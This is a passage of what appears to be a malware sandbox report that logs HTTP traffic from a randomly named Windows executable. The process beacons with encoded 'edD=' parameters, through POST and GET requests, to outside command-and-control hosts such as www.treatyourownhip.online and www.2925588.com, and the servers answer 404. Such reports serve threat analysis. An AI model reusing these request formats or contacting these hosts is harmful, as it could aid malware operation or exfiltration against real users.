                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 69 57 41 52 58 79 79 4c 52 36 51 32 4f 43 59 63 6d 6d 4e 52 4d 54 51 55 50 58 65 7a 79 34 6f 6e 50 4d 53 68 43 43 67 41 68 69 68 4d 39 6e 59 51 4a 31 32 2f 2b 61 78 36 6e 49 5a 41 53 7a 64 4e 4a 43 5a 62 4e 42 6f 6d 6c 43 5a 31 33 46 79 30 34 61 54 69 6c 45 38 35 37 79 37 4c 4f 50 49 4d 55 70 4c 6c 61 41 74 67 45 68 4a 49 30 30 6d 68 6e 54 36 67 4b 64 6a 70 42 67 76 71 67 77 54 6b 6b 57 46 6a 6f 52 52 59 75 78 42 47 6d 5a 69 33 4f 70 4e 70 72 78 57 59 67 46 65 37 79 6d 7a 5a 6f 2f 33 46 70 66 65 33 37 6e 54 32 31 68 53 63 30 33 31 35 2b 44 6c 51 41 70 62 58 7a 4d 6e 48 34 6b 2f 39 58 45 6c 39 54 4e 73 42 6d 43 72 61 30 43 63 74 49 71 41 78 44 74 4e 51 6c 58 6e 46 4a 48 4f 6e 55 75 6d 71 2f 6f 54 75 74 69 6d 6b 61 4e 46 6a 52 4b 7a 7a 67 43 35 62 71 4a 41 63 77 57 2f 4c 5a 43 34 75 75 35 6f 2f 41 76 68 45 55 44 66 4d 6b 6c 67 73 78 70 50 5a 44 54 55 41 4c 54 68 6f [TRUNCATED]
                                                                                                                                Data Ascii: edD=thkoKA3lS59Vo4KeBqXkRI4XboB8V2PwzGQuo2hOKPiWARXyyLR6Q2OCYcmmNRMTQUPXezy4onPMShCCgAhihM9nYQJ12/+ax6nIZASzdNJCZbNBomlCZ13Fy04aTilE857y7LOPIMUpLlaAtgEhJI00mhnT6gKdjpBgvqgwTkkWFjoRRYuxBGmZi3OpNprxWYgFe7ymzZo/3Fpfe37nT21hSc0315+DlQApbXzMnH4k/9XEl9TNsBmCra0CctIqAxDtNQlXnFJHOnUumq/oTutimkaNFjRKzzgC5bqJAcwW/LZC4uu5o/AvhEUDfMklgsxpPZDTUALThoJU6RnkizF4HIGo3nr9ESQfjcwSUh/mELdL3TZLW5lF9tH8RCkC5KFCWR9WMq9SvbtLo7ckvh8eSoD7xm+M3OmjtKynVAmlnBEIt/zmdvBSz+oJ81dHXpVjUEhuJgYRQwN3vteq5AapO6rxfR4+Ohfyj0AHuTJG9XJLFL00NUdfg0bHIfRbbAtCwCOzsnQ2Tsc3twb1M4J9O1NFOWloI+LSyNNkWnw5pqVsx+wY0ad15jad5tXkr+HL4okuOamtTLbOvgFqnq0f2fy+5uXtUGYL1dVqGGqxGmzVnSIWiEJ1Xmsn4UvKsMyx5a6eH/6iydOr3aIvBxj3dPSuzQsspuIfn8FWtdQE9Jb0SuDFOpt+pvUelMLDa2sWkqc+d5XKaHaZfO9p4OJzQu+f+ex8PuCbPOERzyyWKohPbiLcEeeHpeV0BU4E64juriVs41sN7GxjU6fECEt2Uq8OEaHfRISdcSTEx4l/JaW0R/kusCZX7DpVHN2s1RvbzUzovssTpeHN1pRtgSZSM9u/UIfYPhvu+HuiW8kQlUt0/OYfw5wW6E9n5IHuCumtpYqtTSDPfQl/gMdJcqCxmtoeek1svG0O/hM8vMXij1dotoLc+Mr/zS4GwbZH9yB0OpvJJFAAoOHdenjCtNDd+Ew2bLgj6jQ9UeW1vwCuicuu [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:54:58.142385006 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:57 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.849720103.71.154.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:59.743482113 CET426OUTGET /1t94/?edD=gjMIJwSCW/9UgfmDC9v9JuEAXY9+Tk/wxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjZ5WYlhZ6IbItanfVRefUclVTIAe/3x+VFj+y2sVXiouoQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:55:00.676203012 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:00 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.84972181.169.145.95805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:06.161556959 CET708OUTPOST /pq4g/ HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.treatyourownhip.online
                                                                                                                                Referer: http://www.treatyourownhip.online/pq4g/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 43 43 73 39 30 4a 6a 52 30 67 59 6b 62 2f 41 45 72 4c 67 76 55 61 46 61 33 43 6b 4b 53 4b 6e 56 6b 55 41 30 42 73 6a 61 52 45 78 68 2f 6e 4c 34 2b 70 47 6e 4a 4d 6f 38 31 72 6f 5a 64 39 65 4b 6c 39 68 77 44 4e 44 73 4d 73 6d 57 62 36 48 71 75 78 43 73 48 78 70 77 2f 45 37 58 49 79 41 5a 54 62 5a 65 4e 31 67 4c 2f 4c 36 53 64 2b 4c 48 76 6e 31 55 75 64 59 62 34 43 77 69 45 35 48 5a 71 71 30 2f 63 62 7a 49 58 6f 57 54 53 43 4e 46 6b 35 45 36 7a 66 74 4e 33 78 66 4e 46 55 7a 72 66 79 6a 50 33 72 5a 48 7a 34 63 62 66 36 35 55 64 34 59 46 73 33 67 42 42 6d 34 3d
                                                                                                                                Data Ascii: edD=yzT5osvCN/CmCCs90JjR0gYkb/AErLgvUaFa3CkKSKnVkUA0BsjaRExh/nL4+pGnJMo81roZd9eKl9hwDNDsMsmWb6HquxCsHxpw/E7XIyAZTbZeN1gL/L6Sd+LHvn1UudYb4CwiE5HZqq0/cbzIXoWTSCNFk5E6zftN3xfNFUzrfyjP3rZHz4cbf65Ud4YFs3gBBm4=
                                                                                                                                Oct 29, 2024 16:55:06.999253988 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:06 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.84972281.169.145.95805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:08.701910973 CET728OUTPOST /pq4g/ HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.treatyourownhip.online
                                                                                                                                Referer: http://www.treatyourownhip.online/pq4g/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 2f 2f 56 6c 78 6b 30 41 75 4c 61 53 45 78 68 6e 58 4c 35 30 4a 47 6f 4a 4d 6b 30 31 72 6b 5a 64 39 4b 4b 6c 38 52 77 45 2b 37 6a 4f 38 6d 51 44 4b 48 6f 78 42 43 73 48 78 70 77 2f 45 76 74 49 79 6f 5a 54 71 4a 65 4e 51 4d 4d 38 4c 36 4e 59 2b 4c 48 39 58 31 51 75 64 59 44 34 44 73 49 45 37 76 5a 71 6f 73 2f 64 4b 7a 4a 43 59 57 52 57 43 4d 6b 6a 4a 77 33 38 4e 4a 70 33 77 76 30 4e 6b 2f 64 65 45 53 6c 74 4a 52 42 77 34 30 77 66 35 52 69 59 50 46 74 32 55 77 78 66 78 76 5a 5a 6e 52 33 77 53 54 58 70 77 35 6b 59 73 58 39 44 61 65 67
                                                                                                                                Data Ascii: edD=yzT5osvCN/CmER092uPRgwYjUfAElrgrUaZa3DgkT//Vlxk0AuLaSExhnXL50JGoJMk01rkZd9KKl8RwE+7jO8mQDKHoxBCsHxpw/EvtIyoZTqJeNQMM8L6NY+LH9X1QudYD4DsIE7vZqos/dKzJCYWRWCMkjJw38NJp3wv0Nk/deESltJRBw40wf5RiYPFt2UwxfxvZZnR3wSTXpw5kYsX9Daeg
                                                                                                                                Oct 29, 2024 16:55:09.931350946 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                Oct 29, 2024 16:55:09.931967974 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                Oct 29, 2024 16:55:10.984937906 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                Oct 29, 2024 16:55:10.985960960 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.84972381.169.145.95805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:11.289499998 CET1745OUTPOST /pq4g/ HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.treatyourownhip.online
                                                                                                                                Referer: http://www.treatyourownhip.online/pq4g/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 38 66 56 6c 44 73 30 42 49 44 61 64 6b 78 68 35 6e 4c 38 30 4a 47 78 4a 4d 4d 34 31 72 34 4a 64 2f 79 4b 6b 65 70 77 46 50 37 6a 48 38 6d 51 66 36 48 70 75 78 44 75 48 78 35 30 2f 45 2f 74 49 79 6f 5a 54 70 42 65 45 6c 67 4d 36 4c 36 53 64 2b 4c 39 76 6e 31 6f 75 64 77 54 34 44 59 79 45 4b 50 5a 71 49 38 2f 66 34 4c 4a 41 34 57 58 61 69 4d 47 6a 4a 74 33 38 4d 6c 44 33 77 62 53 4e 6d 76 64 66 52 33 69 70 35 4e 70 71 36 73 67 54 62 78 52 65 4f 78 36 2b 48 77 78 57 52 58 42 59 41 6c 50 38 79 33 4b 67 6e 34 50 43 74 62 73 52 39 4c 31 6c 56 45 6f 2b 39 58 6a 6a 39 34 45 76 39 57 54 6f 69 4f 58 33 47 35 4e 76 2b 32 43 44 35 44 30 53 4d 61 49 35 31 30 36 6e 64 4b 48 75 76 73 75 76 62 69 37 67 57 43 65 67 74 53 39 4c 75 53 47 39 62 43 69 72 6b 46 4b 41 36 6d 2b 6d 70 6e 43 58 67 57 4b 59 42 59 35 44 42 71 49 51 6d 59 6a 6f 64 47 52 4d 71 4f 4f 6d 61 4e 58 35 37 58 69 7a 59 [TRUNCATED]
                                                                                                                                Data Ascii: edD=yzT5osvCN/CmER092uPRgwYjUfAElrgrUaZa3DgkT8fVlDs0BIDadkxh5nL80JGxJMM41r4Jd/yKkepwFP7jH8mQf6HpuxDuHx50/E/tIyoZTpBeElgM6L6Sd+L9vn1oudwT4DYyEKPZqI8/f4LJA4WXaiMGjJt38MlD3wbSNmvdfR3ip5Npq6sgTbxReOx6+HwxWRXBYAlP8y3Kgn4PCtbsR9L1lVEo+9Xjj94Ev9WToiOX3G5Nv+2CD5D0SMaI5106ndKHuvsuvbi7gWCegtS9LuSG9bCirkFKA6m+mpnCXgWKYBY5DBqIQmYjodGRMqOOmaNX57XizY0vsHXRqXw5R/FUeWl5eNZiiERdRgK5HX3NfqNUY4MQ/K0q4KwUapMY1j+jzqxDkmM+2H74ch25tMIaVzT281oV8J86ooPUCvA9svXFUvVJpJS+SuyDozFYz1cEHXfzHvLpwkUzObKC6UBTadjQCdn8dKLNvzSPJT3kyxQyZSIwdK5pivXDi+pq7zbTgKikUDS56bvql7n2RcGVknq0l2ujefwzvLiNV8QdMlHGw5QOEo1erzp9CGO/AGPN+XYToktd5Yf1fY54zOnHFt8JjBXe+HdMj4weLVocI3lldjSU4ZDQaRZqR835kpmhohlo5n2D5ramWPAKQKBl/tAW3rHt7QIBLtxMSykEkDbJiLYAHU/mhp3yrxrttMW8JpkQWdz5lzNgm0efgy6FliymOpfC0CyrNOMTdEzrkZBptNSPKN7w/g/86vAxYIplzFXixBSzDDdgF9qadZ0DbSiP2IJzyBqxHD93m35Tkdy9JB6VoOyVsr3OIGpamQTyESHm7xZt3zK7YNsIx7L5Hhlg3dKYEfiJSy638DKui8h7MAxA412EUNimaXi/Jg6VuGNcFrpCEWAMmhRzcPp9ddgpZNlddSJwxzWtbqWxjtvsYoyGob5uvCW2tXcR7JrOviJUWVBBM8viu8BNjks6qmOYVKJswAypRbmZmTyy [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:55:12.115180016 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:11 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.84972481.169.145.95805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:13.837423086 CET437OUTGET /pq4g/?mRR=Vxudf0fHzLw84n3P&edD=/x7ZrZ76GI+PVQICx+fJsRsDfPwUjqoVDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD5OWdqbGxCnsQwRTx3/JOzhGR6ZHHmQh6NCPA8f1t14f7g== HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:55:14.693185091 CET374INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:14 GMT
